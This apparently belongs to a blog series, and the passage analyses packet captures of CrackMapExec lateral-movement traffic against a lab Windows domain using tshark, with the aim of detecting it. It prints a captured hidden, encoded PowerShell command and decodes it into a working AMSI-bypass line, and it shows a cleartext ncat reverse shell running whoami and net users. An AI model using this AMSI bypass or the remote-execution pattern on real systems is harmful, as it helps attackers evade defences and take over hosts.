  109   9.171767   10.0.0.100 → 10.0.0.105   TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128
  110   9.172057   10.0.0.105 → 10.0.0.100   TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  111   9.172070   10.0.0.100 → 10.0.0.105   TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  113   9.180091   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
  115   9.193928   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0
  130   9.223667   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  131   9.223681   10.0.0.100 → 10.0.0.105   TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
  135   9.230843   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
  143   9.256814   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0
  193   9.550036   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  196   9.554980   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  197   9.557240   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  200   9.572289   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  201   9.574589   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  206   9.591850   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  207   9.593175   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  210   9.607005   10.0.0.100 → 10.0.0.105   SMB2 238 Encrypted SMB3
  211   9.607508   10.0.0.105 → 10.0.0.100   SMB2 262 Encrypted SMB3
  214   9.617532   10.0.0.100 → 10.0.0.105   SMB2 294 Encrypted SMB3
  215   9.617975   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  218   9.628218   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
  219   9.628717   10.0.0.105 → 10.0.0.100   SMB2 258 Encrypted SMB3
  222   9.639361   10.0.0.100 → 10.0.0.105   SMB2 258 Encrypted SMB3
....
  423  10.449068   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  424  10.449465   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
  425  10.451778   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  426  10.452430   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0

Uh Oh. From above we see that this traffic is also encrypted. This makes it difficult for our security monitoring tools to effectively do their jobs.

As the previous session was encrypted. Let's now see what we can get from the packets associated with the password policy enumeration.

Without further ado, let's take a look at the packet capture to see if we what type of traffic might be in here.

Looking at the protocol hierarchy, see some SMB and SMB2 traffic.

root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:113 bytes:21694
  arp                                    frames:2 bytes:102
  ip                                     frames:111 bytes:21592
    tcp                                  frames:111 bytes:21592
      nbss                               frames:78 bytes:19550
        smb                              frames:4 bytes:508
        smb2                             frames:74 bytes:19042
===================================================================

Looking at above, I would conclude that there is no encrypted traffic. Let's see if that is true.

Peeking first into SMB traffic, we see:


root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb"
    6   3.214791   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   20   3.237020   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   34   3.279046   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   59   3.394125   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request

From above, we see the SMB packets seems to all be associated with the SMB negotiate protocol request. I would assume at this point the server responded back stating that it would like to use SMB2, this is why we do not see any additional traffic.

Let's now look into the SMB2 traffic.


root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2"
    7   3.215534   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
    9   3.218110   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   10   3.218617   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   11   3.222438   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   12   3.224476   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   13   3.229892   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   14   3.230867   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   15   3.234048   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   16   3.234344   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   21   3.238371   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   23   3.241025   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   24   3.241635   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   25   3.248880   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   26   3.249527   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   27   3.256058   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   28   3.258185   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   35   3.279840   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   37   3.293799   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   38   3.294739   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   39   3.298425   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   41   3.299181   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   42   3.305931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   43   3.308715   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   44   3.313429   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
   45   3.313913   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   .....
   54   3.377248   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
   55   3.377657   10.0.0.105 → 10.0.0.100   SMB2 238 Encrypted SMB3
   60   3.396247   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   62   3.400194   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   63   3.400920   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   64   3.412338   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   65   3.413306   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   67   3.434020   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   68   3.436640   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   69   3.451598   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3 
   77   3.522068   10.0.0.100 → 10.0.0.105   SMB2 258 Encrypted SMB3
   78   3.522898   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   ......
   99   3.704565   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
  100   3.704911   10.0.0.105 → 10.0.0.100   SMB2 246 Encrypted SMB3

Holy smack! Looks like yet another set of encrypted traffic. Well nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.

Let's now see what the communication looks like when crackmapexec runs a powershell command.

As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.

root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:247 bytes:82427
  arp                                    frames:8 bytes:408
  ip                                     frames:239 bytes:82019
    udp                                  frames:4 bytes:860
      ssdp                               frames:4 bytes:860
    tcp                                  frames:235 bytes:81159
      nbss                               frames:121 bytes:29648
        smb                              frames:3 bytes:381
        smb2                             frames:118 bytes:29267
          tcp.segments                   frames:1 bytes:2742
      dcerpc                             frames:31 bytes:40114
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
===================================================================


Looking at the SMB communication, we see below once again, that this is more than likely the client trying to communicatevia SMB version 1.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb"
   16  43.408475   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   30  43.435753   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   42  43.463106   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request

Once again let's look at the SMB2 communication.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2"
   17  43.409255   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   19  43.413105   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   20  43.413704   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   21  43.418281   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   22  43.418780   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   23  43.426458   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   24  43.427636   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   25  43.432235   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   26  43.432623   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   31  43.437344   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   33  43.440996   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   34  43.441606   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   35  43.446277   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   36  43.446815   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   37  43.455948   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   38  43.458155   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   43  43.464624   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45  43.468269   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   46  43.468962   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   49  43.473830   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   50  43.474372   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   51  43.481931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   52  43.484388   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
....
  227  47.334141   10.0.0.105 → 10.0.0.100   SMB2 234 Encrypted SMB3
  228  47.338399   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  229  47.343532   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3

So far we seen that the majority of this tools SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc"
   70  43.594887   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   71  43.595566   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   73  43.603971   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   76  43.640433   10.0.0.100 → 10.0.0.105   ISystemActivator 566 RemoteCreateInstance request
   77  43.645133   10.0.0.105 → 10.0.0.100   ISystemActivator 1078 RemoteCreateInstance response
   81  43.682025   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   82  43.682530   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   86  43.702770   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   88  43.718458   10.0.0.100 → 10.0.0.105   DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   89  43.719805   10.0.0.105 → 10.0.0.100   DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
   90  43.727167   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   91  43.727812   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   92  43.747847   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   94  43.765583   10.0.0.100 → 10.0.0.105   IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0
   95  43.766108   10.0.0.105 → 10.0.0.100   IRemUnknown 118 RemRelease response -> S_OK
   96  43.772729   10.0.0.100 → 10.0.0.105   DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   97  43.773407   10.0.0.105 → 10.0.0.100   DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   98  43.788367   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  100  43.827914   10.0.0.100 → 10.0.0.105   DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  101  43.835340   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2
  103  43.835429   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  105  43.835655   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  107  43.835711   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  109  43.835917   10.0.0.105 → 10.0.0.100   DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
  111  43.835981   10.0.0.105 → 10.0.0.100   DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  114  44.446346   10.0.0.100 → 10.0.0.105   DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  116  44.578642   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  144  44.726719   10.0.0.100 → 10.0.0.105   DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  147  44.753078   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  177  44.960333   10.0.0.100 → 10.0.0.105   DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
  181  44.992849   10.0.0.105 → 10.0.0.100   DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0

The above looks interesting  in that there are some cleartext. Let's follow the stream to see if we see anything of interest. Please note I've edited below for brevity but just tried to keep what I believe was important.

root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794))
Node 0: 10.0.0.100:37794
Node 1: 10.0.0.105:49666
112
....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9.........
.).yPDg...Q' S.
156
................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2.................
.....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C...........
....5......s.H.........
..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A..........
....5.........n..[H....
..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF..........
....5......hj..h$......

===================================================================

As we can see from above, we seem to have some powershell code being executed. However, we do not see any results. This is still good as at least we have something of interes at this point. Let's copy this code and decode it at the Linux command lines


root@securitynik:~/cme# echo "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==" | base64 --decode
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ 
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
get-process

From above, we an conlude that the "get-process" cmdlet was executed via powershell.

No more analysis for us to do on this pcap file via tshark.

Now that we know what a powershell command may look like when run via crackmapexec, let's take a look at the "normal" command being executed. In this case, if you remember in the first post  we executed "ncat.exe", let's see how we may be able to detect this with raw packet analysis.

As always, let's first look at the protocol hierarchy of our pcap.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:356 bytes:86187
  ip                                     frames:356 bytes:86187
    tcp                                  frames:356 bytes:86187
      nbss                               frames:160 bytes:34441
        smb                              frames:3 bytes:381
        smb2                             frames:157 bytes:34060
      dcerpc                             frames:31 bytes:39474
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
      data                               frames:13 bytes:989
      ssl                                frames:14 bytes:1075
        tcp.segments                     frames:4 bytes:256
===================================================================

Now that we have the protocol hierarchy, let's look at the TCP conversations


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:57950           <-> 10.0.0.105:445                  86     15850     100     15434     186     31284     0.023652000        20.0220
10.0.0.105:50602           <-> 10.0.0.100:443                  29      1600      28      2126      57      3726     3.366351000        32.4745
10.0.0.105:49666           <-> 10.0.0.100:43388                26      9658      23     28398      49     38056     0.145434000        19.8985
10.0.0.100:57952           <-> 10.0.0.105:445                  14      2952      15      2945      29      5897     0.042055000        19.9831
10.0.0.100:57948           <-> 10.0.0.105:445                   9      1638      10      1166      19      2804     0.000000000        20.0444
10.0.0.100:60342           <-> 10.0.0.105:135                   7      2808       9      1612      16      4420     0.098815000        19.9435
================================================================================

If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more
  190   3.366351   10.0.0.105 → 10.0.0.100   TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
  191   3.366379   10.0.0.100 → 10.0.0.105   TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128
  192   3.366597   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0
  200   3.496322   10.0.0.105 → 10.0.0.100   TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42
  201   3.496342   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0
  202   3.496527   10.0.0.105 → 10.0.0.100   SSL 110 Continuation Data
  203   3.496533   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0
  204   3.511061   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  205   3.511078   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0
............

  347  30.994013   10.0.0.105 → 10.0.0.100   TCP 60 [TCP segment of a reassembled PDU]
  348  30.994030   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0
  349  30.994182   10.0.0.105 → 10.0.0.100   SSL 60 Continuation Data
  350  30.994188   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0
  351  35.836894   10.0.0.100 → 10.0.0.105   TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5
  352  35.837355   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5
  353  35.837371   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0
  354  35.840523   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0
  355  35.840639   10.0.0.100 → 10.0.0.105   TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0
  356  35.840840   10.0.0.105 → 10.0.0.100   TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0

From above, we see port 443 which suggests SSL communication. However, we see no SSL negotiation which is typically done after the 3 way handshake is completed. Considering there is no SSL negotiation, is there a possibility that we may be able to see the cleartext data? Let's reassemble the session via following the tcp stream to see what we get.


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and t
cp.dstport eq 50602))
Node 0: 10.0.0.105:50602
Node 1: 10.0.0.100:443
42
Microsoft Windows [Version 10.0.17763.253]

(c) 2018 Microsoft Corporation. All rights reserved.
C:\>
whoami

whoami

securitynik\administrator
C:\>
net users
net users
User accounts for \\

-------------------------------------------------------------------------------

Administrator            Guest                    
krbtgt                   
nakia                    neysa                    nik                      
Prague                   
saadia                   
securitynik              
The command completed with one or more errors.

C:\>
exit
exit

Ahhh from above we see that even though the traffic is on port 443, we can see this communication is not encrypted. Interesting!

If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:


root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 a
nd tcp.dstport eq 49666))
Node 0: 10.0.0.100:43388
Node 1: 10.0.0.105:49666

......
.......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................
.............................................................................................................................................................................................
...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri..........
....5.......,L....f....
.............................................................................................................................................................................................
.............................................................................................................................................................................................
